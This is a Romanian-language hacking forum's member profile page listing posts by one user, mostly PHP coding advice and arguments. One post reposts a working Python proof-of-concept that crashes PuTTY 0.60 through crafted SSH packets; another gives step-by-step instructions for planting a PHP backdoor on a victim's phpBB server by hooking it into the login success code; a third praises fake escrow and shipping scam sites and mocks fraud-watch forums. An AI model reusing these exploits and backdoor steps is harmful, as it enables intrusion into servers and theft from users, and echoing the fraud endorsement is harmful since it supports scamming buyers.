Jump to content

Serar

Members
  • Posts

    43
  • Joined

  • Last visited

Posts posted by Serar

  1. Salut!

    Eu cu programarea nu-s "pretenas" de multa vreme si, umbland pe ici colo, mi-am adus aminte sa arunc un ochi peste frameworkuri.

    Avand in vedere ca nu-s foarte experimentat in programare, m-ar afecta negativ incercarea utilizarii frameworkurilo?

    Problema e in felul urmator, daca esti incepator si treci direct la framework sa zicem Zend e o mare probabilitate sa ajungi programator de zend framework nu de php(nativ), e posibil sa te lovesti dupa un timp de faptul ca nu stii sa scrii cod nativ, nu zic ca nu e bine sa incercti un freamwork, te ajuta mult, iti dezvolta "privirea" asupra codului scris corect si gandit, insa inainte invata sa scri cod nativ php

    • Upvote 1
  2.  print "\n"
    print "----------------------------------------------------------------"
    print "| putty 0.60 Null Ptr |"
    print "| Level Smash the Stack |"
    print "----------------------------------------------------------------"
    print "\n"

    import sys, socket, binascii
    HOST = sys.argv[1]
    PORT = 22
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((HOST, PORT))
    s.listen(1)
    conn, addr = s.accept()
    buf = [
    ("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
    ("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
    "e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
    "10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
    "362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
    "96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
    "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
    "33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
    "32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
    "d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
    "22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
    "d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
    "d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
    "111001111111111111111111111111111"), ## The 00 controls the crash
    ("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
    "64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
    "76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
    "85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
    "000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
    "3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
    "a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
    "f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
    "3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
    "b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
    "75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
    "20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
    "6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
    "ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
    "cac4453d629a47d000000000000000000"),
    ("0000000c0a15a1640000c32700008e14")
    ]


    i = 0
    for i in range(0,len(buf)):
    conn.send(binascii.unhexlify(buf[i]))
    i+=1
    conn.close()
    s.close()

    Source : http://www.exploit-db.com/exploits/18270/

  3. Instalare:

    Pas1:

    Este cam aceeasi treaba ca si la iStealer, ai nevoie de un subdomeniu, si o baza da date, in arhiva de download o sa gasiti un sql importati-l in baza de date, si uploadati pe server tot inafara de backdoor.php si fisierul sql(importat anterior). In index.php puneti-va datele bazei de date


    $con=mysql_connect('localhost','root','') or die(mysql_error());
    //selectam baza de date
    mysql_select_db('back',$con) or die(mysql_error());

    Pentru login default este Admin:admin

    pozatt2.png

    Pas2

    fisierul backdoor.php trebuie uploadat pe serverul victima si inclus in includes/function.php insa inainte de asta mergeti la linia : $link='http://127.0.0.1/phpbackdoor'; si puneti-va linkul facut la pasul 1.

    mergeti in function.php cautati


    // The result parameter is always an array, holding the relevant information...
    if ($result['status'] == LOGIN_SUCCESS)
    {

    si dupa "{" adaugati include '/cale/backdoor.php';

    pozatt.png

    Download:Get phpbackdoor.rar on Wupload.com

    Si aici sa terminat, source : Aici

  4. daca nu e bataie de de cap... poate faceti putin misto si de "corectii" astia care pun bete in roate multor romanasi care aduc bani in tara asta. FFFF multe situri fie de shipping fie de escrow sunt reclamate acolo.. ca prietenul nostru google sa le arate oamenilor "nevinovati"

    Online Fraud-watch

    traducere in romaneste :

    cacati astia de pe forumul asta :

    Online Fraud-watch

    fac topicuri cu siturile FAKE de ESCROW sau SHIPPING sau etc ale noastre..

    ale romanilor in general, care ii tapim pe alti de bani

    si ne incurca povestea, ca omu da pe google situ. si apare pe forumu astora ca e Frauda...

    si ar fi mai frumos sa nu mai fie

    penibil

    Daca nu poti fura atunci nu fura!

  5. sper sa reusesc sa il fac mai departe asa cum vreau eu, oricum mersi mult pentru ajutor.

    doar ca am dat de o problema care ma depaseste....

    Warning: get_headers() [function.get-headers]: This function may only be used against URLs

    am pus si allow_url_fopen on .. si degeaba....

    orice idee sau solutie e binevenita :)..

    pune @ in fata functiei get_headers, atat timp cat site-ul e ok va face redirect daca nu va da site-ul nu merge

  6. incepem istoria de ieri

    daca tu erai prietenos si potlicos prin posturile alea, atunci nu mai zic nimic.

    la partea cu punctele 1.2.3.4

    mai bine ai face asa mai des, sa dai niste sfaturi, decat sa te dai mare.

    eu caut cea mai buna solutie un limita cunostintelor mele.

    sa comentez codul nu am nevoie, ca eu stiu fiecare linie ce face, din moment ce eu am scris-o

    nu stiu javascript ca sa fac cu javascript, fac cu ce stiu

    o optimzez in liimita cunostintelor mele.

    cand o sa fii mai potlitcos si mai intelept o sa vorbesc si fara "ba" .

    am spus eu ca sunt ace ?

    cel putin nu ma dau asa destept ca tine, si vad iarasi incep sa apara like-urile la posturile tale...

    sunt prost asa cum zici tu, dar da-mi odata pace si lasa-ma asa cum sunt si vezi-ti de treburile tale.

    eu macar incerc sa ajut lumea, spre deosebire de tine sa vorbesc aiurea si ma dau mare.

    daca ai cunostinte, foarte bine pentru tine.

    daca vrei sa ajuti omu, posteaza in topic ceva care sa ii fie util.

    daca nu vrei sa-l ajuti, nu mai posta frate, si vezi-ti de treaba ta

    Garry tu pui paie pe foc, benny are o experienta mai mare + e mai in varsta, fii modest si nu o sa se mai lege nimeni de tine.

  7. @tex

    I-o mai usor , intai daca ai V.I.P respecta regulile ti-ar prinde bine si ti-ar fi de mare ajutor ! Poftim iti dau eu link : http://rstcenter.com/forum/3968-regulile-forumului-cititi-cu-atentie.rst , sa il citesti pe tot !

    Nu ca ar fi o discutie interesanta insa daca ai citi blogul lui tex ai realiza ca nu sunt 10 ca el pe intreg forumul, atat cunostinte cat si inteligenta , asa ca daca nu respecta regulile nu va interesa pe cineva pe langa cunostintele sale folositoare acestui forum, app stirea e penibila.

  8. Pentru prima chestie

    <?php 
    $ftp_server = "Server";
    $ftp_user_name = "User";
    $ftp_user_pass = "Parola";

    $last_modified = filemtime("/var/www/.....");
    $now = strtotime("now");
    $old = $now - $last_modified;
    if($old > 3600)
    {
    $filename = "/var/www/.......";
    unlink($filename);
    $local_file = '/var/www/......';
    $remote_file = '.................'; // aici pui toata adresa adica cand intrii pe ftp pana la server EX:client12/server12/samp/scriptfiles/loguri/nume.log
    $conn_id = ftp_connect($ftp_server);
    $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
    if (ftp_get($conn_id, $local_file, $remote_file, FTP_BINARY)) {
    //echo "Successfully written to $local_file\n";
    } else {
    //echo "There was a problem\n";
    }

    ftp_close($conn_id);
    }


    echo "<table class='sample'><tr>
    <td width='40px' class='title'>ID</td>
    <td class='title' width='150px'>Admin</td>
    <td width='200px' class='title'>Nume</td>
    <td width='150px' class='title'>Motiv</td>
    <td width='300px' class='title'>Data</td>
    </tr>
    ";
    $i=1;
    if(!$file=fopen("..........","r")) die("Error reading housefile");
    $strings = "";
    while (($data=fgetcsv($file,1024, ",")) !== FALSE)
    {
    $test = array(
    "ID" => $i,
    "Admin" => $data[0],
    "Nume" => $data[1],
    "Motiv" => $data[2],
    "Data" => $data[3],
    );
    $stringv = "<tr>";
    foreach($test as $line => $v)
    {

    $stringv = $stringv . "<td><center><b><font size='1' face='Verdana' color='#ffffff'>" .$v. "</font></b></center></td>";
    }
    $i++;
    $stringv = $stringv . "</tr>\n";
    $strings = $stringv . $strings;
    }
    echo $strings . "
    </table>";

    ?>

    daca tot ai pus o parte a tabelului pe $strings de ce nu ai pus si prima parte? e un output in plus primul echo + partea cu atribuire $stringv cu tr (use ' '), partea cu fondurile nu are ce cauta se face css

  9. Uhuu, nici nu vreau sa revad codul, e bagat la gramada, am secvente la care inchid intr-un loc cate 7-8 acolade... Da, eram la inceput.

    Nu sunt adeptul framework-urilor, nu m-am mai ocupat de el, am trecut la C/C++ si altele si nu am mai avut timp.

    Am vazut ca e un amalgam, eu am intrebat asa ca fapt divers, credeam ca ai facut si forum, si eram curios de cate query facusei pe pagina. Oricum bafta la C

  10. Mi-au cerut 2 persoane asa ceva si l-am uploadat:

    http://www.speedyshare.com/file/5g2fF/Selenity-CMS-v0.2.zip

    sunt curios daca ai mai continuat sa implementezi si forumul pentru cms, doar asa ca fapt divers ai putea folosi si un framework( poti folsi zend framework are deja plugin pentru csfr, ar trebui sa rescrii codul, nu cred ca se merita), desi am vazut ca ai folosit un "fel" de framework, desi nu prea e oridine intre logic si view-er, dar avand in vedere ca probabil atunci erai mai incepator in programare

  11. Doresc sa creez un fisier, unde sa verifice anumite variabile, iar daca nu sunt indeplinite sa nu mai execute scriptul. O sa dealiez:

    Acum am astfel.

    Fisier verificare.php:

    <? if($_GET['nr']>10) header('location ...'); ?>

    Fisier index.php:

    <?

    include('verificare.php');

    ///restul scriptului

    ?>

    Problema este ca tot imi executa scriptul inainte sa ma redirectioneze

    Multumesc mult si o zi buna,

    Laurentiu

    Daca chiar vrei ajutor atunci da scriptul complet+detalii, nimeni de pe forum nu va sta sa dea cu presupusul cum, unde , de ce ?etc.

×
×
  • Create New...